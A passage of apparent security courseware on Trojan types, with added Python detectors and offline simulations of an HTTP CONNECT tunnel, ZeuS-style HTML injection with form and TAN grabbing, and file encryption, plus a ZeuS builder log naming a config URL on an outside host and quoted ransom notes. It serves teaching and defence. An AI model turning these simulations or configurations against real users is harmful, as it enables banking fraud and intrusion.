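LISTEN_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def parse_tasklist(text):
    """Map PID -> image name from `tasklist /fo csv` output."""
    reader = csv.DictReader(io.StringIO(text))
    return {int(row["PID"]): row["Image Name"] for row in reader}


def parse_listeners(text):
    """Yield (port, pid) for every TCP LISTENING line in `netstat -ano` output."""
    for line in text.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            yield int(m.group(2)), int(m.group(3))


def find_unexpected_listeners(netstat_text, tasklist_text, baseline=BASELINE):
    """Return findings for listeners that the baseline does not explain.

    Each finding is a dict with port, pid, image and reason. A port that is in
    the baseline but served by a different image is still reported, because a
    Trojan can squat on a port the allowlist considers normal.
    """
    images = parse_tasklist(tasklist_text)
    findings = []
    for port, pid in parse_listeners(netstat_text):
        image = images.get(pid, "<unknown>")
        if baseline.get(port) == image:
            continue
        if port in baseline:
            reason = "port %d expected from %s, served by %s" % (port, baseline[port], image)
        elif port in SUSPECT_PORTS:
            reason = "unbaselined %s port" % SUSPECT_PORTS[port]
        else:
            reason = "listener not in baseline"
        findings.append({"port": port, "pid": pid, "image": image, "reason": reason})
    return sorted(findings, key=lambda f: f["port"])


if __name__ == "__main__":
    for f in find_unexpected_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print("port %-5d pid %-5d %-14s %s" % (f["port"], f["pid"], f["image"], f["reason"]))
```

On the sample the script reports ports 21, 443 and 5900, owned by TinyFTPD.exe, chess.exe and vnc.exe; the two baselined listeners are silent. The baseline ties each port to an image name rather than just listing ports, so that a Trojan reusing port 443 behind a legitimate-looking name still has to match the expected process to pass.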
ICMP Tunneling
- Covert channels are methods in which an attacker can hide the data in a protocol that is undetectable
- They rely on techniques called tunneling, which allow one protocol to be carried over another protocol
- ICMP tunneling uses ICMP echo-request and reply to carry a payload and stealthily access or control the victim's machine
ICMP Trojan: icmpsend
[Screenshot: two command prompts. ICMP Client (command: icmpsend <victim ip>): ICMP-Cmd v1.0 beta by gxisone, 2012/8/15; usage: icmpsend RemoteIP; Ctrl+C or Q/q to quit, H/h for help; built-in commands such as [pslist] and [pskill ID]. ICMP Server (command: icmpsrv -install): usage icmpsrv -install / icmpsrv -remove; transmitting file, creating service, starting service ... success. Commands are sent using ICMP protocol.]
ICMP Tunneling
The concept of ICMP tunneling is simple, since arbitrary information tunneling in the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets is possible. ICMP_ECHO traffic thus contains a covert channel that can be exploited by tunneling. Network devices do not filter the contents of ICMP_ECHO traffic, making the use of this channel attractive to hackers: they simply pass the packets, drop them, or return them. The Trojan packets themselves are masquerading as common ICMP_ECHO traffic. The packets can encapsulate (tunnel) any required information. Covert channels are methods in which an attacker can hide the data in a protocol that is undetectable. They rely on techniques called tunneling, which allow one protocol to be carried over another protocol. A covert channel is defined as a vessel through which information can pass, and it is generally not used for information exchanges. Therefore, covert channels cannot be detected by using standard system security methods. Any process or bit of data can be a covert channel. This makes it an attractive mode of transmission for a Trojan, since an attacker can use the covert channel to install the backdoor on the target machine.
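The notes above make the defender's problem concrete: the icmpsend/icmpsrv pair puts its commands in the data field of ICMP echo packets, and network devices normally pass that field through untouched. The one thing a monitor can do cheaply is look at the data field itself. As an added example (not courseware code and not part of any ICMP tool named here), the following Python script parses raw ICMP echo packets, verifies the RFC 1071 checksum, and reports any echo whose data does not match the fixed filler that the Windows and iputils ping programs send. The packets are constructed in-line with the build_echo helper; the assumption that Linux pings carry an 8- or 16-byte timestamp ahead of the data[i] = i fill is a simplification of the common iputils builds.

```python
"""Flag ICMP echo packets whose data field is not an ordinary ping filler.

Added example, not courseware code and not part of icmpsend/icmpsrv.
ICMP tunnels carry their commands in the data field of ICMP_ECHO and
ICMP_ECHOREPLY, so the defender's first filter is that field: verify the
checksum, then compare the data with the fixed patterns that legitimate
ping implementations send. All packets below are constructed in-line.
"""
import struct

ECHO_REPLY, ECHO_REQUEST = 0, 8
# Filler that Windows ping.exe sends (32 bytes).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_checksum(data):
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type, ident, seq, payload):
    """Build an ICMP echo request/reply with a correct checksum (constructed test data)."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def linux_ping_payload(size=56):
    """iputils ping fills data[i] = i, then overwrites the first bytes with a timestamp.

    The timestamp is all zeros here because its value does not matter to the check.
    """
    return b"\x00" * 8 + bytes(i & 0xFF for i in range(8, size))


def is_linux_ping_payload(payload):
    """True if the data after an 8- or 16-byte timestamp follows the data[i] = i fill.

    Assumption: these two timestamp widths cover the common iputils builds.
    """
    for ts_len in (8, 16):
        expected = bytes(i & 0xFF for i in range(ts_len, len(payload)))
        if len(payload) > ts_len and payload[ts_len:] == expected:
            return True
    return False


def classify_echo(packet):
    """Return (verdict, reason) for one raw ICMP packet (header plus data)."""
    if len(packet) < 8:
        return "malformed", "shorter than an ICMP header"
    icmp_type, _code, csum, _ident, _seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_type not in (ECHO_REQUEST, ECHO_REPLY):
        return "other", "type %d is not an echo" % icmp_type
    # Recompute the checksum over the packet with the checksum field zeroed.
    if icmp_checksum(packet[:2] + b"\x00\x00" + packet[4:]) != csum:
        return "malformed", "bad checksum"
    payload = packet[8:]
    if not payload:
        return "benign", "empty data field"
    if payload == WINDOWS_PING_PAYLOAD:
        return "benign", "Windows ping filler"
    if is_linux_ping_payload(payload):
        return "benign", "Linux ping filler"
    printable = sum(32 <= b < 127 for b in payload) / len(payload)
    return "suspect", "%d-byte data field matches no ping filler (%.0f%% printable)" % (
        len(payload), 100 * printable)


def scan(packets):
    """Classify every packet; returns a list of (verdict, reason)."""
    return [classify_echo(p) for p in packets]


if __name__ == "__main__":
    samples = [
        build_echo(ECHO_REQUEST, 1, 1, WINDOWS_PING_PAYLOAD),
        build_echo(ECHO_REQUEST, 0x1234, 1, linux_ping_payload()),
        build_echo(ECHO_REPLY, 0x1234, 7, b"pslist\x00"),   # constructed tunnel-style reply
    ]
    for verdict, reason in scan(samples):
        print(verdict, "-", reason)
```

The check is deliberately an allowlist of known-good fillers rather than a blocklist of tunnel signatures: a tool can change its encoding at will, but a host that sends echoes with arbitrary data while claiming to be an ordinary ping is anomalous whatever the encoding. A printable ratio near 100% on a non-filler payload is the pattern a command-and-response tunnel like the one on the slide would produce.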
[Screenshot: ICMP Client (command: icmpsend <victim ip>) and ICMP Server (command: icmpsrv -install) command prompts, as on the slide; commands are sent using ICMP protocol]
FIGURE 6.27: ICMP Tunneling
Remote Access Trojans
- This Trojan works like a remote desktop access
- Hacker gains complete GUI access to the remote system
1. Infect (Rebecca's) computer with server.exe and plant Reverse Connecting Trojan
2. The Trojan connects to Port 80 to the attacker in Russia, establishing a reverse connection
3. Jason, the attacker, has complete control over Rebecca's machine
[Diagram: Jason, attacker sitting in Russia; Rebecca, victim infected with RAT Trojan; attacker gains 100% (complete) access to the system]
Remote Access Trojans
Remote access Trojans provide full control over the target's system to attackers and enable them to remotely access files, private conversations, accounting data, and so on in the target's machine. The remote access Trojan acts as a server, and listens on a port that is not supposed to be available to Internet attackers. Therefore, if the target is behind a firewall on the network, there is less chance that a remote attacker would be able to connect to the Trojan. Attackers on the same network located behind the firewall can easily access the Trojans. Examples include the Back Orifice and NetBus Trojans. Another example, the Bugbear virus that hit the Internet in September 2002, installed a Trojan horse on targets' systems, giving access to sensitive data to the remote attackers. This Trojan works like a remote desktop access. The attacker gains complete GUI access to the remote system. The process is as follows:
1. Infects (Rebecca's) computer with server.exe and plants Reverse Connecting Trojan.
2. The Trojan connects to Port 80 to the attacker in Russia, establishing a reverse connection.
3. Jason, the attacker, has complete control over Rebecca's machine.
[Diagram: Jason, attacker sitting in Russia; Rebecca, victim infected with RAT; attacker gains 100% (complete) access to the system]
FIGURE 6.28: Attacker infecting victim's machine using Remote access Trojans
Remote Access Trojan: RAT DarkComet and Apocalypse
[Screenshot: DarkComet RAT main window listing connected victims by IP (WAN/LAN) and port, computer name / user, operating system, status and connection time (12/03/2010 19:14); status: listening]
Remote Access Trojan: RAT DarkComet and Apocalypse
DarkComet is a tool that allows you to remotely access the administrative controls and privileges of an infected machine without the user's knowledge or permission. It provides you with access to processes, registry, command prompts, webcams, microphones and applications, and can even provide a keylogger whenever you use the system.
[Screenshot: DarkComet-RAT v2.0 RC3, User(s): 21, listing victims by IP, computer name / user, OS (Windows XP, Vista and 7 build 7600), ping time and active window caption]
FIGURE 6.29: RAT DarkComet Screenshot
Apocalypse Remote Access Trojan is a tool that allows you to modify the entire registry and allows .dll files to run executables. It runs in invisible mode when it is executed.
[Screenshot: Apocalypse Remote Administration Tool v1.4.4.1: Connections, Builder, Statistics and About tabs; per-victim functions include remote desktop, webcam and audio capture, online and offline keylogger, chat server, send message, file manager, file search, remote download, registry editor, clipboard manager, service manager, process manager, window manager, command prompt, password manager and an installed applications list]
FIGURE 6.30: Apocalypse Screenshot
Covert Channel Trojan: CCTT
- The Covert Channel Tunneling Tool (CCTT) Trojan presents various exploitation techniques, creating arbitrary data transfer channels in the data streams authorized by a network access control system
- It enables attackers to get an external server shell from within the internal network and vice versa
- It sets a TCP/UDP/HTTP CONNECT | POST channel allowing TCP data streams (SSH, SMTP, POP, etc.) between an external server and a box from within the internal network
Covert Channel Trojan: CCTT
The Covert Channel Tunneling Tool (CCTT) is a covert channel tool. It offers several ways to create arbitrary data transfer channels inside the data streams (TCP, UDP, HTTP) that a network access control system already authorizes. It enables attackers to get a shell on an external server from within the internal network and vice versa. It sets up a TCP/UDP/HTTP CONNECT|POST channel that carries TCP data streams (SSH, SMTP, POP, etc.) between an external server and a host inside the internal network. Because the carrier is a permitted protocol, for example an HTTP CONNECT through the corporate proxy, the tunnel passes the access control that would block a direct outbound SSH connection.
FIGURE 6.31: Covert Channel Trojan (diagram: Client → Proxy Chain → CCTT Server → Target Services)
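The CONNECT carrier described above, as an added example that is not CCTT's own code: a client opens an HTTP CONNECT tunnel through a proxy and then speaks an inner, SSH-like protocol to the service behind it. The proxy and the target are toy stand-ins running on local threads (assumed: the proxy honours any CONNECT, as a permissive corporate proxy would), and the SSH banner and echo protocol are constructed for the demo, so everything runs offline.

```python
"""Added example (not CCTT's own code): a minimal HTTP CONNECT tunnel, the
carrier CCTT uses to push a TCP stream such as SSH through a proxy that the
network access control permits. Proxy and target are stand-ins on local
threads; the SSH-like banner and echo protocol are constructed for the demo."""
import socket
import threading


def _read_until(sock, marker, buf=b""):
    """Read until marker is seen; return (bytes through marker, leftover)."""
    while marker not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    head, sep, rest = buf.partition(marker)
    return head + sep, rest


def _relay(src, dst):
    """Copy bytes one way until src closes, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def connect_proxy(listener, log):
    """Toy proxy: serve one CONNECT host:port, then relay opaque bytes both ways.
    The CONNECT line is the only thing it sees in the clear, and all it logs."""
    conn, _ = listener.accept()
    with conn:
        head, _ = _read_until(conn, b"\r\n\r\n")
        method, target, _version = head.split(b"\r\n", 1)[0].split(b" ")
        if method != b"CONNECT":
            conn.sendall(b"HTTP/1.1 405 Method Not Allowed\r\n\r\n")
            return
        host, port = target.decode().rsplit(":", 1)
        log.append(f"CONNECT {host}:{port}")       # the defender's entire view
        with socket.create_connection((host, int(port))) as upstream:
            conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
            back = threading.Thread(target=_relay, args=(upstream, conn))
            back.start()
            _relay(conn, upstream)
            back.join()


def ssh_like_target(listener, log):
    """Stand-in for the service behind the tunnel (think sshd on the CCTT
    server): send a banner, echo one line upper-cased, hang up."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(b"SSH-2.0-cctt-demo\r\n")
        line, _ = _read_until(conn, b"\n")
        log.append(f"target got {line!r}")
        conn.sendall(line.upper())


def tunnel_through_proxy(proxy_addr, target_addr):
    """Client side of the covert channel: CONNECT through the proxy, then speak
    the inner protocol as if directly connected to target_addr."""
    hostport = f"{target_addr[0]}:{target_addr[1]}"
    with socket.create_connection(proxy_addr) as s:
        s.sendall(f"CONNECT {hostport} HTTP/1.1\r\nHost: {hostport}\r\n\r\n".encode())
        head, rest = _read_until(s, b"\r\n\r\n")
        status = head.split(b"\r\n", 1)[0]
        if b" 200 " not in status:
            raise RuntimeError(f"proxy refused tunnel: {status!r}")
        # From here the proxy relays blind: this is the inner SSH-like stream.
        banner, rest = _read_until(s, b"\n", rest)
        s.sendall(b"ping\n")
        reply, _ = _read_until(s, b"\n", rest)
    return banner.strip().decode(), reply.strip().decode()


def run_demo():
    """Run target, proxy and client on ephemeral localhost ports; return
    (banner, reply, log)."""
    socket.setdefaulttimeout(5)                 # never hang the demo
    log = []
    target_l = socket.create_server(("127.0.0.1", 0))
    proxy_l = socket.create_server(("127.0.0.1", 0))
    threads = [threading.Thread(target=ssh_like_target, args=(target_l, log)),
               threading.Thread(target=connect_proxy, args=(proxy_l, log))]
    for t in threads:
        t.start()
    try:
        return (*tunnel_through_proxy(proxy_l.getsockname(), target_l.getsockname()), log)
    finally:
        for t in threads:
            t.join()
        target_l.close()
        proxy_l.close()
```

Note what the proxy's log line contains: only `CONNECT host:port`. That is the defender's whole view of the channel, so detection of CCTT-style tunnels rests on the destination port (CONNECT to anything other than 443), the session's lifetime and byte ratio, and whether the bytes following the 200 response begin a TLS handshake at all.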
E-banking Trojans
E-banking Trojans
E-banking Trojans are very dangerous and have become a major threat to banking transactions performed online. The Trojan is installed on the victim's computer when he or she opens an email attachment or clicks on an advertisement, and it becomes active once the victim logs in to the banking site. The Trojan is preprogrammed with a minimum and a maximum amount to steal, so it does not withdraw all the money from the account. It also takes screenshots of the bank account statement; the victims are not aware of this kind of fraud and believe that there is no change in their bank balance unless they check it from another system or from an ATM. Only then will the difference be noticed. The following diagram explains how the attack is carried out using E-banking Trojans.
[Figure: the attacker uploads malicious advertisements, which are published among legitimate websites; a user accessing an infected website is redirected to the malicious exploit kit on the malware server and the user's PC is exploited; the Trojan reports as a new bot to the command and control server and reports the user's activities; when the user accesses the bank account, the command and control server sends instructions to manipulate the bank transaction, the Trojan manipulates the user's transaction with the financial institution and reports the successful/failed transaction back to the server.]
FIGURE 6.32: Illustrating the attack using E-banking Trojans
Here the attacker first prepares malicious advertisements and publishes them among genuine websites. When a victim accesses the infected website, it automatically redirects him or her to a site from which the exploit kit is loaded onto the victim's system. The exploit kit lets the attacker control what is loaded onto the victim's system and is used to install a Trojan horse. This malware is highly obfuscated and is detected by only a few anti-virus products. The victim's system is now a bot that sends and receives instructions from the command and control server without the victim's knowledge. When the victim accesses his or her bank account from the infected system, all the sensitive information used to access the account, such as login credentials (user name and password), phone number, security number, date of birth, etc., is sent to the command and control server by the Trojan. If the victim opens the transaction section of the banking website to perform an online transaction, the data entered in the transaction form is sent to the command and control server instead of to the bank website. The command and control server analyzes and decodes the information and identifies suitable money mule bank accounts. The Trojan then receives instructions from the command and control server to submit the transaction form, as rewritten by the server, to the bank so that the money is transferred to the mule account. The bank's confirmation of the successful or failed transfer is also reported by the Trojan to the command and control server.
Banking Trojan Analysis
TAN Grabber
- Trojan intercepts a valid TAN entered by a user
- It replaces the TAN with a random number that will be rejected by the bank
- Attacker can misuse the intercepted TAN with the user's login details
HTML Injection
- Trojan creates fake form fields on e-banking pages
- Additional fields elicit extra information such as card number and date of birth
- Attacker can use this information to impersonate and compromise the victim's account
Form Grabber
- Trojan analyses POST requests and responses to the victim's browser
- It compromises the scramble pad authentication
- Trojan intercepts scramble pad input as the user enters Customer Number and Personal Access Code
Banking Trojan Analysis
A banker Trojan is a malicious program that obtains personal information about users and clients of online banking and payment systems. Banking Trojan analysis involves the following three basic types:
TAN Grabber: A Transaction Authentication Number (TAN) is a single-use password used to authenticate an online banking transaction. The banking Trojan explicitly attacks online banking services that depend on the TAN. When the TAN is entered, the Trojan grabs that number and replaces it with a random, incorrect number that the bank rejects. The Trojan filters the page content so that the victim does not notice the replacement. An attacker can then use the intercepted, still unused TAN together with the target's login details.
HTML Injection: This type of Trojan adds extra fields to the forms of online banking sites, and these fields are used by the attacker to collect the target's account details, credit card number, date of birth, etc. Because the fields are injected into a page that really came from the bank, the browser still shows the bank's genuine address and certificate. Attackers can use this information to impersonate and compromise the target's account.
Form Grabber: This is an advanced method of collecting the data that users submit through web forms in the various browsers. The Trojan hooks the browser and reads the form fields before they are encrypted for transmission, so SSL/TLS does not protect them. It is highly effective in collecting target IDs, passwords, and other sensitive information.
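The three techniques above in one constructed simulation, added as an example that is neither the page's code nor any real Trojan's: the injection rule uses the `set_url` / `data_before` / `data_inject` / `data_after` layout of ZeuS-style webinject files (assumed here: the text between `data_before` and `data_after` is replaced by `data_inject`); the bank page, the field names and the TAN are invented for the demo, and `unexpected_fields` is the page-integrity comparison a defender would make, not something the Trojan does.

```python
"""Added example, not from the page or any real Trojan: a constructed
simulation of HTML injection, form grabbing and TAN swapping on bank traffic.
The injection rule follows the ZeuS-style webinject layout (assumed here):
what lies between data_before and data_after is replaced by data_inject."""
import random
import re
from urllib.parse import parse_qs, urlencode

# Constructed bank login page (not a real bank's markup).
BANK_LOGIN_PAGE = (
    '<form action="/login" method="post">\n'
    '  <input name="customer_no">\n'
    '  <input type="password" name="pac">\n'
    '  <button>Log in</button>\n'
    '</form>'
)

# Constructed webinject rule: add card number and date of birth fields.
INJECT_RULE = {
    "set_url": "https://bank.example/login*",
    "data_before": '<input type="password" name="pac">',
    "data_inject": '\n  <label>Card number</label><input name="cardno">'
                   '\n  <label>Date of birth</label><input name="dob">\n  ',
    "data_after": "<button>Log in</button>",
}


def html_inject(url, body, rule=INJECT_RULE):
    """HTML injection: on a matching URL, replace the text between
    data_before and data_after with data_inject. The page still arrives from
    the real bank over TLS; only the copy the browser renders is changed."""
    pattern = re.escape(rule["set_url"]).replace(r"\*", ".*")
    if not re.fullmatch(pattern, url):
        return body
    start = body.find(rule["data_before"])
    if start < 0:
        return body
    start += len(rule["data_before"])
    end = body.find(rule["data_after"], start)
    if end < 0:
        return body
    return body[:start] + rule["data_inject"] + body[end:]


def parse_form(body):
    """application/x-www-form-urlencoded body -> {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def grab_and_swap_tan(post_body, grabbed, rng=random):
    """Form grabber plus TAN grabber on an outgoing POST: record every field
    the victim typed (the hook sits before TLS encryption), then replace the
    one-time TAN with a random number of the same length so the bank rejects
    this attempt while the attacker still holds a valid, unused TAN."""
    fields = parse_form(post_body)
    grabbed.append(dict(fields))                 # what goes to the C&C
    tan = fields.get("tan", "")
    if tan.isdigit():
        fake = tan
        while fake == tan:
            fake = "".join(rng.choice("0123456789") for _ in tan)
        fields["tan"] = fake
    return urlencode(fields)


def unexpected_fields(served_html, rendered_html):
    """Defender-side page-integrity comparison: input names the browser shows
    that the bank never served."""
    names = lambda html: set(re.findall(r'<input[^>]*\bname="([^"]+)"', html))
    return names(rendered_html) - names(served_html)


def demo():
    """Run both hooks over constructed traffic; return (rendered page,
    forwarded POST body, list of grabbed field dicts)."""
    grabbed = []
    rendered = html_inject("https://bank.example/login?lang=en", BANK_LOGIN_PAGE)
    forwarded = grab_and_swap_tan("customer_no=12345678&pac=s3cret&tan=847213", grabbed)
    return rendered, forwarded, grabbed
```

The point of `unexpected_fields` is that the injection is invisible to the bank's server and to TLS: only a comparison between what was served and what was rendered (or an out-of-band confirmation of the transaction details, as with the two-factor wire-transfer checks mentioned in the security news at the top of the module) exposes it.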
E-banking Trojan: ZeuS and SpyEye
- The main objective of the ZeuS and SpyEye Trojans is to steal bank and credit card account information, FTP data, and other sensitive information from infected computers via web browsers and protected storage
- SpyEye can automatically and quickly initiate an online transaction
[Slide screenshots: the ZeuS Control Panel Builder (config and loader building) and the SpyEye panel; see Figures 6.33 and 6.34]
E-banking Trojan: ZeuS and SpyEye
ZeuS
Source: http://www.secureworks.com
ZeuS is a serious threat to online banking transactions because it uses both a form grabber and keystroke logging. It is spread mainly through drive-by downloads and phishing schemes. The ZeuS botnet targets only Windows; newer versions of ZeuS also run on Windows Vista. It has evolved over time and includes a full arsenal of information-stealing capabilities:
- Steals data submitted in HTTP forms
- Steals account credentials stored in the Windows Protected Storage
- Steals client-side X.509 public key infrastructure (PKI) certificates
- Steals FTP and POP account credentials
- Steals/deletes HTTP and Flash cookies
- Modifies the HTML pages of target websites for information stealing purposes
- Redirects targets from target web pages to attacker controlled ones
- Takes screenshots and scrapes HTML from target sites
- Searches for and uploads files from the infected computer
- Modifies the local hosts file (%SystemRoot%\system32\drivers\etc\hosts)
- Downloads and executes arbitrary programs
- Deletes crucial registry keys, rendering the computer unable to boot into Windows
[Screenshot: ZeuS Control Panel Builder, "Config and loader building" tab, with a Source config file field (Browse...) and the buttons Edit config, Build config and Build loader; other tabs: Builder, Logs decoder. Output pane:
Loading config from file 'C:\Documents and Settings\Kobayashi\Desktop\Troyano_ZeuS\ZeuS\local\config.txt'... Loading succeeded!
Creating loader file 'C:\Documents and Settings\Kobayashi\Desktop\Troyano_ZeuS\ldr.exe'...
botnet=[MAIN]
timer_config=3600000, 60000
timer_logs=60000, 60000
timer_stats=1200000, 60000
url_config=http://203.142.10.2/~ytxjrtrav/web/cfg.bin
Build succeeded!]
FIGURE 6.33: ZeuS Screenshot
SpyEye
SpyEye is malicious software used by attackers to steal money from victims' online bank accounts. It is actually a botnet, operated through a network of command-and-control servers. It triggers automatically when the victim starts a transaction and can even block the bank's transactions.
[Screenshot: SpyEye control panel (tabs Statistic, Find INFO, Settings; actions Get statistic, Get hosts), with a confirmation dialog asking whether to ban a host.]
FIGURE 6.34: SpyEye Screenshot
Destructive Trojans: M4sT3r Trojan
- M4sT3r is a dangerous and destructive type of Trojan
- This Trojan formats all local and network drives
- When executed, this Trojan destroys the operating system
- The user will not be able to boot the operating system
Destructive Trojans: M4sT3r Trojan
The M4sT3r Trojan is designed exclusively to destroy or delete files on the victim's computer. Files are deleted automatically by the Trojan, which can be controlled by the attacker or preprogrammed, like a logic bomb, to perform a particular task at a given time and date. When executed, this Trojan destroys the operating system, so the victim can no longer boot it. It also formats all local and network drives.
FIGURE 6.35: Attacker using M4sT3r Trojan for deleting or destroying files (diagram: the attacker sends the M4sT3r Trojan the commands "Format USB Drive, network Drive ..." and "Format C:\ E:\ F:\ ...")
Notification Trojans
- A notification Trojan sends the IP address (and thus the location) of the victim's machine to the attacker
- Whenever the victim's computer connects to the Internet, the attacker receives the notification
Notification Types
- SIN Notification: Directly notifies the attacker's server
- ICQ Notification: Notifies the attacker using ICQ channels
- PHP Notification: Sends the data by connecting to a PHP server on the attacker's server
- E-Mail Notification: Sends the notification through email
- Net Send: Notification is sent through the net send command
- CGI Notification: Sends the data by connecting to a CGI script on the attacker's server
- IRC Notification: Notifies the attacker using IRC channels
[Diagram: victim infected with the Trojan → notification → attacker]
Notification Trojans
Notification Trojans send the IP address of the victim's computer to the attacker. Whenever the victim operates the system, the notification Trojan notifies the attacker. Some of the notification types include:
- SIN Notification: Directly notifies the attacker's server
- ICQ Notification: Notifies the attacker using ICQ channels
- PHP Notification: Sends the data by connecting to a PHP server on the attacker's server
- Email Notification: Sends the notification through email
- Net Send: Notification is sent through the net send command
- CGI Notification: Sends the data by connecting to a CGI script on the attacker's server
- IRC Notification: Notifies the attacker using IRC channels
Credit Card Trojans
- Credit card Trojans steal victims' credit card related data such as card number, CVV2, and billing details
- Credit card Trojans trick users into visiting fake e-banking websites and entering personal information
- Trojan servers transmit the stolen data to remote hackers using email, FTP, IRC, or other methods
[Diagram: Attacker, Victim, credit card]
Credit Card Trojans
Once installed on the victim's system, credit card Trojans collect details such as credit card numbers and the latest billing details. They then present a fake online banking registration form and make the credit card user believe that it is a genuine request from the bank. Once the user enters the required information, the attackers collect it and use the credit card for their own purposes without the victim's knowledge. Credit card Trojans steal victims' credit-card-related data such as card number, CVV2, and billing details. These Trojans trick users into visiting fake e-banking websites and entering personal information. The Trojan servers transmit the stolen data to remote hackers using email, FTP, IRC, or other methods.
FIGURE 6.36: Attacker stealing a victim's credit card information using a credit card Trojan
Data Hiding Trojans (Encrypted Trojans)
- Encryption Trojan encrypts data files in the victim's system and renders the information unusable
- Attackers demand a ransom or force victims to make purchases from their online drug stores in return for the password to unlock the files
- "Your computer caught our software while browsing illegal porn pages, all your documents, text files, databases in the folder My Documents was encrypted with complex password."
- "Do not try to search for a program that encrypted your information - it simply does not exist in your hard disk anymore," pay us the money to unlock the password
[Diagram: encrypted targets on the victim's system: Confidential Documents, Company Database, C++ source code, Personal Information, Financial Information, Important Files & Folders]
Data Hiding Trojans (Encrypted Trojans)
Encryption Trojans encrypt the data present on the victim's computer and render all of it unusable: "Your computer caught our software while browsing illegal porn pages, all your documents, text files, databases in the folder My Documents was encrypted with complex password." Attackers demand a ransom or force victims to make purchases from their online drugstores in return for the password to unlock the files: "Do not try to search for a program that encrypted your information - it simply does not exist in your hard disk anymore, pay us the money to unlock the password." The data can be decrypted only by the attacker, who demands money or forces the user to buy from a few websites in return for decryption.
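A defender's check for the behaviour described above, added here as an example (not from the page): bulk-encrypted files are statistically close to random, so their Shannon entropy approaches 8 bits per byte, whereas documents, source code and most databases sit far lower. The victim folder and the XOR "encryption" are constructed for the demo; a real encryption Trojan uses a proper cipher, but the output statistics are the same.

```python
"""Added example (not from the page): an entropy check for the bulk file
encryption an encryption Trojan performs. The victim folder and the XOR
'encryption' below are constructed; a real Trojan uses a proper cipher, but
its output is just as close to uniformly random."""
import math
import os
import random
import tempfile
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or single-valued input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def suspicious_files(root, threshold=7.5, min_size=512):
    """Return paths (relative to root) whose contents look encrypted.
    Small files are skipped: entropy measured on a few bytes means nothing."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                data = f.read()
            if len(data) >= min_size and shannon_entropy(data) > threshold:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def toy_encrypt(plain: bytes, rng: random.Random) -> bytes:
    """Stand-in for the Trojan's cipher: XOR with a random keystream. With an
    unknown key the result is as unrecoverable as the ransom note claims, and
    statistically indistinguishable from real ciphertext."""
    return bytes(p ^ rng.randrange(256) for p in plain)


def demo():
    """Constructed victim folder: three text documents, two of which the
    Trojan encrypts in place. Returns what the check flags."""
    doc = b"Quarterly figures: revenue up 4%, costs flat. Action items follow.\n" * 80
    rng = random.Random(1)                     # fixed seed: repeatable demo
    with tempfile.TemporaryDirectory() as root:
        for name in ("report.txt", "notes.txt", "customers.csv"):
            with open(os.path.join(root, name), "wb") as f:
                f.write(doc)
        for name in ("report.txt", "customers.csv"):
            path = os.path.join(root, name)
            with open(path, "rb") as f:
                plain = f.read()
            with open(path, "wb") as f:
                f.write(toy_encrypt(plain, rng))
        return suspicious_files(root)
```

Compressed and already-encrypted formats (zip, docx, jpeg, PDF streams) also score near 8 bits per byte, so in practice this check is a trigger for investigation that is combined with the write rate, extension changes or a canary file, not a verdict on its own.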
OS X Trojan: Crisis
- OSX.Crisis is a Trojan horse that steals potentially confidential information and opens a back door on the compromised computer
- When the Trojan is executed, it creates the following directories and files:
/System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworker_server.xpc/Contents/MacOS/com.apple.mdworker_server
/System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworker_server.xpc/Contents/Resources/
$HOME/Library/LaunchAgents/com.apple.mdworker.plist
$HOME/Library/Preferences/jl3V7we.app
$HOME/Library/ScriptingAdditions/appleHID/Contents/Info.plist
$HOME/Library/ScriptingAdditions/appleHID/Contents/MacOS/lUnsA3Ci.Bz7
$HOME/Library/ScriptingAdditions/appleHID/Contents/Resources/appleOsax.r
- Crisis may perform the following actions: monitor Skype audio traffic; record conversations in MS Messenger and Adium; monitor Safari or Firefox to record websites and capture screenshots; send files to the command and control server
OS X Trojan: Crisis
OSX.Crisis is a Trojan horse that steals potentially sensitive information from the victim's system and opens a back door on the compromised computer for future attacks. When the Trojan is executed, it creates the following directories and files:
/System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworker_server.xpc/Contents/MacOS/com.apple.mdworker_server
/System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworker_server.xpc/Contents/Resources/
$HOME/Library/LaunchAgents/com.apple.mdworker.plist
$HOME/Library/Preferences/jl3V7we.app
$HOME/Library/ScriptingAdditions/appleHID/Contents/Info.plist
$HOME/Library/ScriptingAdditions/appleHID/Contents/MacOS/lUnsA3Ci.Bz7
$HOME/Library/ScriptingAdditions/appleHID/Contents/Resources/appleOsax.r
The following are the actions performed by OSX.Crisis:
- Monitor Skype audio traffic
- Monitor Safari or Firefox to record websites and capture screenshots
- Record conversations in MS Messenger and Adium
- Send files to the command and control server
